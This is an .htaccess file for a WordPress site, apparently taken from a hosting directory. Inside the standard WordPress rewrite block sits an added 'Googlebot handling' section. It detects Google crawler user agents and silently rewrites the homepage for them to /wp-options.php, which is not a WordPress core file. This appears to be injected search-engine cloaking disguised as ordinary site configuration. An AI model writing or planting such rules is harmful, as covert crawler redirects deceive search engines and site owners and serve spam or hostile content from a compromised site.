File: /home/u728655182/domains/qualityservices.com.ar/public_html/.htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# --- Googlebot handling ---
# Detect Google crawlers
RewriteCond %{HTTP_USER_AGENT} (Googlebot|AdsBot|Mediapartners-Google|APIs-Google) [NC]
# Redirect Googlebot hitting the homepage
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ /wp-options.php [L]
# --- Default WordPress rules ---
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress